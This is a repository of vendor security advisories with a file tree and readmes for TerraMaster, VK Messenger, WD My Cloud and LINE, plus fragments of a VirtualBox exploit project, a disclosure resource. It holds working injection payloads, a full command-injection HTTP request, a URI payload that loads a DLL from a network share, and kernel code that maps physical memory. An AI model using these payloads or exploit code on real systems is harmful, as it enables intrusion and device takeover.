├── SSD Advisory - 3435 └── readme.md ├── SSD Advisory - 3602 └── readme.md ├── SSD Advisory - 3674 └── readme.md ├── SSD Advisory - 3676 └── readme.md ├── SSD Advisory - 3679 └── readme.md ├── SSD Advisory - 3681 └── readme.md ├── SSD Advisory - 3685 └── readme.md ├── SSD Advisory - 3686 └── readme.md ├── SSD Advisory - 3689 └── readme.md ├── SSD Advisory - 3700 └── readme.md ├── SSD Advisory - 3723 └── readme.md ├── SSD Advisory - 3724 └── readme.md ├── SSD Advisory - 3727 └── readme.md ├── SSD Advisory - 3731 └── readme.md ├── SSD Advisory - 3736 ├── exploit │ ├── poc_vrdpexploit │ │ ├── vrdpexploit.sln │ │ └── vrdpexploit │ │ │ ├── MyHGSMI.cpp │ │ │ ├── MyMain.cpp │ │ │ ├── MyMemoryMapper.cpp │ │ │ ├── VBoxMPCr.cpp │ │ │ ├── VBoxMPHGSMI.cpp │ │ │ ├── VBoxMPWddm.cpp │ │ │ ├── VBoxOGLgen │ │ │ ├── NULLfuncs.c │ │ │ ├── cr_gl.h │ │ │ ├── cr_opcodes.h │ │ │ ├── cr_packfunctions.h │ │ │ ├── cropengl.def │ │ │ ├── debug_opcodes.c │ │ │ ├── dispatch.c │ │ │ ├── errorspu.c │ │ │ ├── feedbackspu.c │ │ │ ├── feedbackspu_proto.h │ │ │ ├── feedbackspu_state.c │ │ │ ├── getprocaddress.c │ │ │ ├── glloader.c │ │ │ ├── pack_arrays_swap.c │ │ │ ├── pack_bbox.c │ │ │ ├── pack_bounds_swap.c │ │ │ ├── pack_bufferobject_swap.c │ │ │ ├── pack_client_swap.c │ │ │ ├── pack_clipplane_swap.c │ │ │ ├── pack_current.c │ │ │ ├── pack_fog_swap.c │ │ │ ├── pack_lights_swap.c │ │ │ ├── pack_materials_swap.c │ │ │ ├── pack_matrices_swap.c │ │ │ ├── pack_misc_swap.c │ │ │ ├── pack_pixels_swap.c │ │ │ ├── pack_point_swap.c │ │ │ ├── pack_program_swap.c │ │ │ ├── pack_regcombiner_swap.c │ │ │ ├── pack_stipple_swap.c │ │ │ ├── packer.c │ │ │ ├── packspu.c │ │ │ ├── packspu_beginend.c │ │ │ ├── packspu_flush.c │ │ │ ├── packspu_get.c │ │ │ ├── packspu_proto.h │ │ │ ├── passthroughspu.c │ │ │ ├── server_dispatch.c │ │ │ ├── server_dispatch.h │ │ │ ├── server_get.c │ │ │ ├── server_retval.c │ │ │ ├── server_simpleget.c │ │ │ ├── spu_dispatch_table.h │ │ │ ├── spuchange.c │ │ │ ├── spucopy.c │ │ │ ├── state │ │ │ │ ├── cr_currentpointers.h │ │ │ │ └── cr_statefuncs.h │ │ │ ├── state_buffer_gen.c │ │ │ ├── state_current_gen.c │ │ │ ├── state_fog_gen.c │ │ │ ├── state_get.c │ │ │ ├── state_hint_gen.c │ │ │ ├── state_isenabled.c │ │ │ ├── state_lighting_gen.c │ │ │ ├── state_line_gen.c │ │ │ ├── state_multisample_gen.c │ │ │ ├── state_polygon_gen.c │ │ │ ├── state_regcombiner_gen.c │ │ │ ├── state_viewport_gen.c │ │ │ ├── tsfuncs.c │ │ │ ├── unpack.c │ │ │ ├── unpack_extend.h │ │ │ └── windows_exports.asm │ │ │ ├── _Constants.cpp │ │ │ ├── iprt │ │ │ └── nt │ │ │ │ └── nt.h │ │ │ ├── product-generated.h │ │ │ ├── version-generated.h │ │ │ ├── vrdpexploit.inf │ │ │ ├── vrdpexploit.vcxproj │ │ │ ├── vrdpexploit.vcxproj.filters │ │ │ └── vrdpexploit.vcxproj.user │ └── poc_vrdpexploit_launcher │ │ ├── hostid_hijacker │ │ ├── HostIdHijacker.c │ │ ├── ReflectiveDll.c │ │ ├── ReflectiveDllInjection.h │ │ ├── ReflectiveLoader.c │ │ ├── ReflectiveLoader.h │ │ ├── Shellcode.asm │ │ ├── hostid_hijacker.vcxproj │ │ ├── hostid_hijacker.vcxproj.filters │ │ └── hostid_hijacker.vcxproj.user │ │ ├── vrdpexploit_launcher.sln │ │ └── vrdpexploit_launcher │ │ ├── Driver.c │ │ ├── GetProcAddressR.c │ │ ├── GetProcAddressR.h │ │ ├── Inject.c │ │ ├── LoadLibraryR.c │ │ ├── LoadLibraryR.h │ │ ├── Main.c │ │ ├── Process.c │ │ ├── ReflectiveDLLInjection.h │ │ ├── _Constants.c │ │ ├── vrdpexploit_launcher.vcxproj │ │ ├── vrdpexploit_launcher.vcxproj.filters │ │ └── vrdpexploit_launcher.vcxproj.user └── readme.md ├── SSD Advisory - 3737 └── readme.md ├── SSD Advisory - 3743 └── readme.md ├── SSD Advisory - 3747 └── readme.md ├── SSD Advisory - 3751 └── readme.md ├── SSD Advisory - 3758 └── readme.md ├── SSD Advisory - 3759 └── readme.md ├── SSD Advisory - 3765 └── readme.md ├── SSD Advisory - 3766 └── readme.md ├── SSD Advisory - 3769 └── readme.md ├── SSD Advisory - 3778 └── readme.md ├── SSD Advisory - 3781 └── readme.md ├── SSD Advisory - 3783 └── readme.md ├── SSD Advisory - 3786 └── readme.md ├── SSD Advisory - 3796 └── readme.md ├── SSD Advisory - 3802 └── readme.md ├── SSD Advisory - 3814 └── readme.md ├── SSD Advisory - 3899 └── readme.md ├── SSD Advisory - 3904 └── readme.md ├── SSD Advisory - 3923 └── readme.md ├── SSD Advisory - 3926 └── readme.md ├── SSD Advisory - 3928 └── readme.md ├── SSD Advisory - 3944 ├── powend (code) │ ├── AppDelegate.h │ ├── AppDelegate.m │ ├── Assets.xcassets │ │ ├── AppIcon.appiconset │ │ │ └── Contents.json │ │ └── Contents.json │ ├── Base.lproj │ │ ├── LaunchScreen.storyboard │ │ └── Main.storyboard │ ├── Info.plist │ ├── ViewController.h │ ├── ViewController.m │ ├── code.h │ ├── main.m │ ├── mig.c │ ├── powend.entitlements │ └── uexploit.c ├── powend.xcodeproj │ ├── project.pbxproj │ ├── project.xcworkspace │ │ ├── contents.xcworkspacedata │ │ ├── xcshareddata │ │ │ └── IDEWorkspaceChecks.plist │ │ └── xcuserdata │ │ │ └── simo.xcuserdatad │ │ │ └── UserInterfaceState.xcuserstate │ └── xcuserdata │ │ └── simo.xcuserdatad │ │ ├── xcdebugger │ │ └── Breakpoints_v2.xcbkptlist │ │ └── xcschemes │ │ └── xcschememanagement.plist ├── powendTests │ ├── Info.plist │ └── powendTests.m ├── powendUITests │ ├── Info.plist │ └── powendUITests.m └── readme.md ├── SSD Advisory - 3957 └── readme.md ├── SSD Advisory - 3980 └── readme.md ├── SSD Advisory - 3987 └── readme.md ├── SSD Advisory - 3991 ├── poc.c └── readme.md ├── SSD Advisory - 4002 ├── poc.c └── readme.md ├── SSD Advisory - 4007 ├── poc │ ├── avatar.png │ └── poc.php └── readme.md ├── SSD Advisory - 4033 ├── poc │ ├── id_xmss │ └── sshd_config └── readme.md ├── SSD Advisory - 4047 └── readme.md ├── SSD Advisory - 4066 ├── poc │ ├── IOKit.framework │ │ └── Versions │ │ │ └── A │ │ │ └── IOKit │ ├── ios_reverseshell │ ├── iospwn_typhoonPwn_2019.xcodeproj │ │ ├── project.pbxproj │ │ ├── project.xcworkspace │ │ │ ├── contents.xcworkspacedata │ │ │ └── xcuserdata │ │ │ │ └── aa.xcuserdatad │ │ │ │ └── UserInterfaceState.xcuserstate │ │ ├── xcshareddata │ │ │ └── xcschemes │ │ │ │ └── iospwn_typhoonPwn_2019.xcscheme │ │ └── xcuserdata │ │ │ └── aa.xcuserdatad │ │ │ ├── xcdebugger │ │ │ └── Breakpoints_v2.xcbkptlist │ │ │ └── xcschemes │ │ │ └── xcschememanagement.plist │ ├── iospwn_typhoonPwn_2019 │ │ ├── ALOA_exp.c │ │ ├── AppDelegate.h │ │ ├── AppDelegate.m │ │ ├── Assets.xcassets │ │ │ ├── AppIcon.appiconset │ │ │ │ └── Contents.json │ │ │ └── Contents.json │ │ ├── BNSA_exp.c │ │ ├── Base.lproj │ │ │ ├── LaunchScreen.storyboard │ │ │ └── Main.storyboard │ │ ├── IOKitKeys.h │ │ ├── IOKitLib.h │ │ ├── IOReturn.h │ │ ├── IOTypes.h │ │ ├── Info.plist │ │ ├── OSMessageNotification.h │ │ ├── UHAK_final_exp.c │ │ ├── ViewController.h │ │ ├── ViewController.m │ │ ├── inject.h │ │ ├── inject.m │ │ ├── kernel_stru.h │ │ ├── kernel_stu.c │ │ ├── main.m │ │ └── pwned.png │ └── reverseShell │ │ ├── bin │ │ ├── bash │ │ ├── cat │ │ ├── chmod │ │ ├── cp │ │ ├── date │ │ ├── dd │ │ ├── df │ │ ├── hostname │ │ ├── kill │ │ ├── launchctl │ │ ├── ln │ │ ├── ls │ │ ├── mkdir │ │ ├── mv │ │ ├── ps │ │ ├── pwd │ │ ├── rm │ │ ├── rmdir │ │ ├── sh │ │ ├── sleep │ │ ├── stty │ │ └── zsh │ │ ├── etc │ │ ├── profile │ │ └── zshrc │ │ ├── sbin │ │ ├── dmesg │ │ ├── ifconfig │ │ ├── kextunload │ │ ├── md5 │ │ ├── mknod │ │ ├── ping │ │ └── shutdown │ │ └── usr │ │ ├── .DS_Store │ │ ├── bin │ │ ├── arch │ │ ├── chflags │ │ ├── cut │ │ ├── du │ │ ├── false │ │ ├── find │ │ ├── fs_usage │ │ ├── grep │ │ ├── gunzip │ │ ├── gzip │ │ ├── head │ │ ├── hexdump │ │ ├── hostinfo │ │ ├── id │ │ ├── killall │ │ ├── less │ │ ├── login │ │ ├── lsmp │ │ ├── more │ │ ├── nano │ │ ├── nohup │ │ ├── passwd │ │ ├── plconvert │ │ ├── printf │ │ ├── renice │ │ ├── reset │ │ ├── sc_usage │ │ ├── scp │ │ ├── screen │ │ ├── script │ │ ├── sed │ │ ├── seq │ │ ├── split │ │ ├── sqlite3 │ │ ├── stat │ │ ├── syslog │ │ ├── tail │ │ ├── tar │ │ ├── tee │ │ ├── time │ │ ├── true │ │ ├── tset │ │ ├── uname │ │ ├── vim │ │ ├── vm_stat │ │ ├── wc │ │ ├── what │ │ ├── which │ │ ├── xargs │ │ └── xxd │ │ ├── local │ │ ├── .DS_Store │ │ ├── bin │ │ │ ├── dbclient │ │ │ ├── dropbear │ │ │ ├── dropbearconvert │ │ │ ├── dropbearkey │ │ │ ├── filemon │ │ │ ├── jtool │ │ │ ├── procexp │ │ │ └── wget │ │ └── lib │ │ │ ├── .DS_Store │ │ │ └── zsh │ │ │ ├── .DS_Store │ │ │ └── 5.0.8 │ │ │ ├── .DS_Store │ │ │ └── zsh │ │ │ ├── attr.so │ │ │ ├── cap.so │ │ │ ├── clone.so │ │ │ ├── compctl.so │ │ │ ├── complete.so │ │ │ ├── complist.so │ │ │ ├── computil.so │ │ │ ├── curses.so │ │ │ ├── datetime.so │ │ │ ├── deltochar.so │ │ │ ├── example.so │ │ │ ├── files.so │ │ │ ├── langinfo.so │ │ │ ├── mapfile.so │ │ │ ├── mathfunc.so │ │ │ ├── newuser.so │ │ │ ├── parameter.so │ │ │ ├── regex.so │ │ │ ├── socket.so │ │ │ ├── stat.so │ │ │ ├── system.so │ │ │ ├── tcp.so │ │ │ ├── termcap.so │ │ │ ├── terminfo.so │ │ │ ├── zftp.so │ │ │ ├── zle.so │ │ │ ├── zleparameter.so │ │ │ ├── zprof.so │ │ │ ├── zpty.so │ │ │ ├── zselect.so │ │ │ └── zutil.so │ │ ├── sbin │ │ ├── chown │ │ ├── ioreg │ │ ├── kextstat │ │ ├── ltop │ │ ├── netstat │ │ ├── nvram │ │ ├── sysctl │ │ └── taskpolicy │ │ └── share │ │ ├── .DS_Store │ │ └── terminfo │ │ ├── 61 │ │ ├── ansi │ │ ├── ansi+arrows │ │ ├── ansi+csr │ │ ├── ansi+cup │ │ ├── ansi+enq │ │ ├── ansi+erase │ │ ├── ansi+idc │ │ ├── ansi+idl │ │ ├── ansi+idl1 │ │ ├── ansi+inittabs │ │ ├── ansi+local │ │ ├── ansi+local1 │ │ ├── ansi+pp │ │ ├── ansi+rca │ │ ├── ansi+rep │ │ ├── ansi+sgr │ │ ├── ansi+sgrbold │ │ ├── ansi+sgrdim │ │ ├── ansi+sgrso │ │ ├── ansi+sgrul │ │ ├── ansi+tabs │ │ ├── ansi-color-2-emx │ │ ├── ansi-color-3-emx │ │ ├── ansi-emx │ │ ├── ansi-generic │ │ ├── ansi-m │ │ ├── ansi-mini │ │ ├── ansi-mono │ │ ├── ansi-mr │ │ ├── ansi-mtabs │ │ ├── ansi-nt │ │ ├── ansi.sys │ │ ├── ansi.sys-old │ │ ├── ansi.sysk │ │ ├── ansi43m │ │ ├── ansi77 │ │ ├── ansi80x25 │ │ ├── ansi80x25-mono │ │ ├── ansi80x25-raw │ │ ├── ansi80x30 │ │ ├── ansi80x30-mono │ │ ├── ansi80x43 │ │ ├── ansi80x43-mono │ │ ├── ansi80x50 │ │ ├── ansi80x50-mono │ │ ├── ansi80x60 │ │ ├── ansi80x60-mono │ │ ├── ansil │ │ ├── ansil-mono │ │ ├── ansis │ │ ├── ansis-mono │ │ ├── ansisysk │ │ └── ansiw │ │ ├── 73 │ │ ├── screen │ │ ├── screen+fkeys │ │ ├── screen-16color │ │ ├── screen-16color-bce │ │ ├── screen-16color-bce-s │ │ ├── screen-16color-s │ │ ├── screen-256color │ │ ├── screen-256color-bce │ │ ├── screen-256color-bce-s │ │ ├── screen-256color-s │ │ ├── screen-bce │ │ ├── screen-s │ │ ├── screen-w │ │ ├── screen.linux │ │ ├── screen.mlterm │ │ ├── screen.rxvt │ │ ├── screen.teraterm │ │ ├── screen.xterm-new │ │ ├── screen.xterm-r6 │ │ ├── screen.xterm-xfree86 │ │ ├── screen2 │ │ └── screen3 │ │ ├── 76 │ │ ├── vt100 │ │ ├── vt100+ │ │ ├── vt100+enq │ │ ├── vt100+fnkeys │ │ ├── vt100+keypad │ │ ├── vt100+pfkeys │ │ ├── vt100-am │ │ ├── vt100-bm │ │ ├── vt100-bm-o │ │ ├── vt100-bot-s │ │ ├── vt100-nam │ │ ├── vt100-nam-w │ │ ├── vt100-nav │ │ ├── vt100-nav-w │ │ ├── vt100-putty │ │ ├── vt100-s │ │ ├── vt100-s-bot │ │ ├── vt100-s-top │ │ ├── vt100-top-s │ │ ├── vt100-vb │ │ ├── vt100-w │ │ ├── vt100-w-am │ │ ├── vt100-w-nam │ │ ├── vt100-w-nav │ │ └── vt100nam │ │ ├── 78 │ │ └── xterm-256color │ │ ├── .DS_Store │ │ └── 6c │ │ ├── linux │ │ ├── linux-basic │ │ ├── linux-c │ │ ├── linux-c-nc │ │ ├── linux-koi8 │ │ ├── linux-koi8r │ │ ├── linux-lat │ │ ├── linux-m │ │ ├── linux-nic │ │ ├── linux-vt │ │ └── linux2.6.26 └── readme.md ├── SSD Advisory - 4099 └── readme.md ├── SSD Advisory - 4100 ├── POC │ └── Invoke-ExploitAnyConnectPathTraversal.psm1 └── readme.md ├── SSD Advisory - 4147 ├── POC │ ├── build.sh │ ├── fake_cryptodev.h │ ├── hack.c │ ├── package.sh │ ├── spray.c │ ├── spray.h │ └── test.sh └── readme.md ├── SSD Advisory – 3915 └── readme.md ├── license.md └── readme.md /SSD Advisory - 3602/readme.md: -------------------------------------------------------------------------------- 1 | **Vulnerability Summary**
2 | The following advisory describes a unauthenticated remote command execution found in TerraMaster TOS 3.0.33. 3 | TOS is a “Linux platform-based operating system developed for TerraMaster cloud storage NAS server. TOS 3 is the third generation operating system newly launched.” 4 | 5 | **Credit**
6 | An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program. 7 | 8 | **Vendor response**
9 | The vendor stated that version 3.1.03 of TerraMaster TOS is no longer vulnerable to this vulnerability, the latest version of the software can be obtained from: http://download.terra-master.com/download.php. 10 | 11 | **Vulnerability details**
12 | User controlled input is not sufficiently filtered and unauthenticated user can execute commands as root by sending a POST request to http://IP/include/ajax/GetTest.php with the following parameters: 13 | 14 | * dev=1 15 | * testtype=;COMMAND-TO-RUN; 16 | * submit=Send 17 | 18 | We can see in the source code that the value of parameter testtype will assign to $line and will execute by shell_exec() 19 | 20 | ```php 21 | $file = "/mnt/base/.".basename($data['dev'])."test"; 22 | if(!file_exists($file)) touch($file); 23 | if(isset($data['testtype'])){//开始或者停止过程... 24 | if($data['testtype'] != 'stop'){ 25 | $line = $data['dev'].':'.$data['testtype'].":".time(); 26 | shell_exec("echo -e \"".$line."\" > $file"); 27 | } 28 | $return = smartscan($data['dev'],$data['testtype']); 29 | }else{//得到状态过程... 30 | $return = smartscan($data['dev']); 31 | } 32 | ``` 33 | 34 | **Proof of Concept**
35 | ```html 36 |
37 | 38 | 39 | 40 |
41 | ``` 42 | -------------------------------------------------------------------------------- /SSD Advisory - 3674/readme.md: -------------------------------------------------------------------------------- 1 | **Vulnerability Summary**
2 | The following describes a vulnerability in VK Messenger that is triggered via the exploitation of improperly handled URI. 3 | VK (VKontakte; [..], meaning InContact) is “an online social media and social networking service. It is available in several languages. VK allows users to message each other publicly or privately, to create groups, public pages and events, share and tag images, audio and video, and to play browser-based games. It is based in Saint Petersburg, Russia”. 4 | 5 | **Credit**
6 | An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program. 7 | 8 | **Affected Version**
9 | VK Messenger version 3.1.0.143 10 | 11 | **Vendor Response**
12 | The vendor responded that the problem no longer affects the latest version – but didn’t provide any information on when it was fixed and whether it was fixed due to someone else reporting this vulnerability. 13 | 14 | **Vulnerability Details**
15 | The VK Messenger, which is part of the VK package, registers a uri handler on Windows in the following way: 16 | 17 | ``` 18 | [HKEY_CLASSES_ROOT\vk] 19 | "URL Protocol"="" 20 | @="URL:vk" 21 | [HKEY_CLASSES_ROOT\vk\shell] 22 | [HKEY_CLASSES_ROOT\vk\shell\open] 23 | [HKEY_CLASSES_ROOT\vk\shell\open\command] 24 | @="\"C:\\Program Files\\VK\\vk.exe\" \"%1\"" 25 | ``` 26 | 27 | When the browser processes the `vk://` uri handler it is possible to inject arbitrary command line parameters for vk.exe, since the application does not properly parse them. It is possible to inject the ‘–gpu-launcher=’ parameter to execute arbitrary commands. It is also possible to inject the ‘–browser-subprocess-path=’ parameter to execute arbitrary commands. Network share paths are allowed, too.
28 | Example of attack encoded in HTML entity: 29 | 30 | `` 31 | 32 | When opening a malicious page, a notification box asks the user to open VK. 33 | NOTE: The application is not in the auto-startup items, and the issue will work if the application is not already started. 34 | -------------------------------------------------------------------------------- /SSD Advisory - 3679/readme.md: -------------------------------------------------------------------------------- 1 | **Vulnerability Summary**
2 | A vulnerability in the Western Digital My Cloud Pro Series PR2100 allows authenticated users to execute commands arbitrary commands. 3 | 4 | **Credit**
5 | An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program. 6 | 7 | **Vendor Response**
8 | The vendor was notified on the 28th of November 2017, and responded that they take security seriously and will be fixing this vulnerability promptly, repeated attempts to get a timeline or fix failed, the last update received from them was on the 31st of Jan 2018, no further emails sent to the vendor were responded. We are not aware of any fix or remediation for this vulnerability. 9 | 10 | **Vulnerability Details**
11 | In detail, due to a logic flaw, with a forged HTTP request it is possible to bypass the authentication for HTTP basic and HTTP digest login types. 12 | Log into the web application using a low privilege user, once the main page loads, find in burp proxy history for a request to `/cgi-bin/home_mgr.cgi` 13 | 14 | ``` 15 | POST /cgi-bin/home_mgr.cgi HTTP/1.1 16 | Host: 10.10.10.193 17 | Content-Length: 25 18 | Accept: application/xml, text/xml, */*; q=0.01 19 | Origin: http://10.10.10.193 20 | X-Requested-With: XMLHttpRequest 21 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_0) AppleWebKit/537.36 22 | (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36 23 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 24 | Referer: http://10.10.10.193/ 25 | Accept-Language: ko,en-US;q=0.8,ko-KR;q=0.6,en;q=0.4 26 | Cookie: PHPSESSID=650fda9b5fe3a35a5315d85bf929b247; fw_version=2.30.165; usern 27 | ame=abcd; local_login=1; isAdmin=0 28 | Connection: close 29 | cmd=7&f_user=abcd$(reboot) 30 | ``` 31 | 32 | The last line can be replaced with:
33 | `cmd=7&f_user=abcd$(ping x.x.x.x)` 34 | 35 | Or:
36 | `cmd=7&f_user=abcd$(mkdir /tmp/nshctest)` 37 | 38 | This means you can run any Linux command and it would execute. But there will be no feedback in the response. 39 | -------------------------------------------------------------------------------- /SSD Advisory - 3724/readme.md: -------------------------------------------------------------------------------- 1 | **Vulnerabilities Summary**
2 | LINE for Windows provided by LINE Corporation specifies the path to read DLL when launching software. A user clicking on a specially crafted link, can use this vulnerability to cause the user to insecurely load an arbitrary DLL which can be used to cause arbitrary code execution. 3 | 4 | **Vendor Response**
5 | “We released version 5.8.0 of the modified version LINE PC version (Windows version) on May 31, 2018, and we have automatically updated for all users. The update will be applied automatically on the system side when using the product. Also, when installing the LINE PC version (Windows version) from now on please use the latest installer”. 6 | 7 | **CVE**
8 | CVE-2018-0609 9 | 10 | **Credit**
11 | An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program. 12 | 13 | **Affected systems**
14 | LINE for Windows before version 5.8.0 15 | 16 | **Vulnerability Details**
17 | When processing a ‘line:’ or ‘lineb:’ URI’s it is possible to pass arbitrary command line parameters to LINE.exe, given that the application does not properly parse the mentioned URI ‘scheme:’. In addition, the ‘-platformpluginpath’ parameter supports network share paths. Using this parameter an attacker can cause the application to remotely load a Qt (https://www.qt.io/) DLL library from the network share, found inside the sub-path /imageformats. 18 | 19 | **PoC**
20 | 21 | ```html 22 | contact me
23 | contact me 2 24 | ``` 25 | 26 | It works with an iframe too. 27 | 28 | ```html 29 | 30 | ``` 31 | 32 | It could be also exploited locally through an .url ‘file:’, for example, creating an internet shortcut file with the next content: 33 | 34 | ```batch 35 | [InternetShortcut] 36 | URL=line://?" -platformpluginpath \\192.168.0.1\uncshare -- 37 | ``` 38 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.27130.2027 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "vrdpexploit", "vrdpexploit\vrdpexploit.vcxproj", "{93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|ARM = Debug|ARM 11 | Debug|ARM64 = Debug|ARM64 12 | Debug|x64 = Debug|x64 13 | Debug|x86 = Debug|x86 14 | Release|ARM = Release|ARM 15 | Release|ARM64 = Release|ARM64 16 | Release|x64 = Release|x64 17 | Release|x86 = Release|x86 18 | EndGlobalSection 19 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 20 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|ARM.ActiveCfg = Debug|ARM 21 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|ARM.Build.0 = Debug|ARM 22 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|ARM.Deploy.0 = Debug|ARM 23 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|ARM64.ActiveCfg = Debug|ARM64 24 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|ARM64.Build.0 = Debug|ARM64 25 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|ARM64.Deploy.0 = Debug|ARM64 26 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|x64.ActiveCfg = Debug|x64 27 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|x64.Build.0 = Debug|x64 28 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|x64.Deploy.0 = Debug|x64 29 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|x86.ActiveCfg = Debug|x64 30 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|x86.Build.0 = Debug|x64 31 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|x86.Deploy.0 = Debug|x64 32 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|ARM.ActiveCfg = Release|ARM 33 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|ARM.Build.0 = Release|ARM 34 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|ARM.Deploy.0 = Release|ARM 35 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|ARM64.ActiveCfg = Release|ARM64 36 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|ARM64.Build.0 = Release|ARM64 37 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|ARM64.Deploy.0 = Release|ARM64 38 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|x64.ActiveCfg = Release|x64 39 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|x64.Build.0 = Release|x64 40 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|x64.Deploy.0 = Release|x64 41 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|x86.ActiveCfg = Release|Win32 42 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|x86.Build.0 = Release|Win32 43 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|x86.Deploy.0 = Release|Win32 44 | EndGlobalSection 45 | GlobalSection(SolutionProperties) = preSolution 46 | HideSolutionNode = FALSE 47 | EndGlobalSection 48 | GlobalSection(ExtensibilityGlobals) = postSolution 49 | SolutionGuid = {9CAAF34D-70C5-431B-BB32-47E116148B13} 50 | EndGlobalSection 51 | EndGlobal 52 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/MyMemoryMapper.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | NTSTATUS 4 | MyMapPhysicalToVirtual(PVOID* virtOut, PHYSICAL_ADDRESS phys, PHYSICAL_ADDRESS physLen) { 5 | NTSTATUS Status = STATUS_UNSUCCESSFUL; 6 | UNICODE_STRING unicodeStr; 7 | OBJECT_ATTRIBUTES objAttr; 8 | HANDLE physMemHandle; 9 | 10 | RtlInitUnicodeString(&unicodeStr, L"\\Device\\PhysicalMemory"); 11 | InitializeObjectAttributes( 12 | &objAttr, 13 | &unicodeStr, 14 | OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, 15 | (HANDLE)NULL, 16 | (PSECURITY_DESCRIPTOR)NULL); 17 | 18 | // Open a handle to the physical-memory section object. 19 | if ((Status = ZwOpenSection(&physMemHandle, SECTION_ALL_ACCESS, &objAttr)) != STATUS_SUCCESS) { 20 | return Status; 21 | } 22 | 23 | PVOID virt = NULL; 24 | Status = ZwMapViewOfSection( 25 | physMemHandle, 26 | NtCurrentProcess(), 27 | &virt, 28 | 0L, 29 | (ULONG_PTR)physLen.QuadPart, 30 | &phys, 31 | (PULONG_PTR)(&(physLen.QuadPart)), 32 | ViewUnmap, 33 | 0, 34 | PAGE_READWRITE | PAGE_WRITECOMBINE); 35 | if (Status != STATUS_SUCCESS) { 36 | return Status; 37 | } 38 | 39 | *virtOut = virt; 40 | ZwClose(physMemHandle); 41 | return STATUS_SUCCESS; 42 | } 43 | 44 | NTSTATUS 45 | MyUnmapVirtual(PVOID virt) { 46 | return ZwUnmapViewOfSection(NtCurrentProcess(), virt); 47 | } 48 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/VBoxOGLgen/pack_bounds_swap.c: -------------------------------------------------------------------------------- 1 | /* THIS FILE IS AUTOGENERATED FROM E:/home/src/VirtualBox/src/VBox/GuestHost/OpenGL/packer/pack_bounds.c BY pack_swap.py */ 2 | 3 | 4 | /* Copyright (c) 2001, Stanford University 5 | * All rights reserved 6 | * 7 | * See the file LICENSE.txt for information on redistributing this software. 8 | */ 9 | 10 | #include "packer.h" 11 | #include "cr_opcodes.h" 12 | #include "cr_mem.h" 13 | 14 | void PACK_APIENTRY crPackBoundsInfoCRSWAP( CR_PACKER_CONTEXT_ARGDECL const CRrecti *bounds, const GLbyte *payload, GLint len, GLint num_opcodes ) 15 | { 16 | CR_GET_PACKER_CONTEXT(pc); 17 | /* Don't get the buffered_ptr here because we've already 18 | * verified that there's enough space for everything. */ 19 | 20 | unsigned char *data_ptr; 21 | int len_aligned, total_len; 22 | 23 | CR_LOCK_PACKER_CONTEXT(pc); 24 | 25 | data_ptr = pc->buffer.data_current; 26 | len_aligned = ( len + 0x3 ) & ~0x3; 27 | total_len = 24 + len_aligned; 28 | 29 | WRITE_DATA(0, int, SWAP32(total_len)); 30 | WRITE_DATA(4, int, SWAP32(bounds->x1)); 31 | WRITE_DATA(8, int, SWAP32(bounds->y1)); 32 | WRITE_DATA(12, int, SWAP32(bounds->x2)); 33 | WRITE_DATA(16, int, SWAP32(bounds->y2)); 34 | WRITE_DATA(20, int, SWAP32(num_opcodes)); 35 | 36 | /* skip the BOUNDSINFO */ 37 | data_ptr += 24; 38 | 39 | /* put in padding opcodes (deliberately bogus) */ 40 | switch ( len_aligned - len ) 41 | { 42 | case 3: *data_ptr++ = 0xff; RT_FALL_THRU(); 43 | case 2: *data_ptr++ = 0xff; RT_FALL_THRU(); 44 | case 1: *data_ptr++ = 0xff; RT_FALL_THRU(); 45 | default: break; 46 | } 47 | 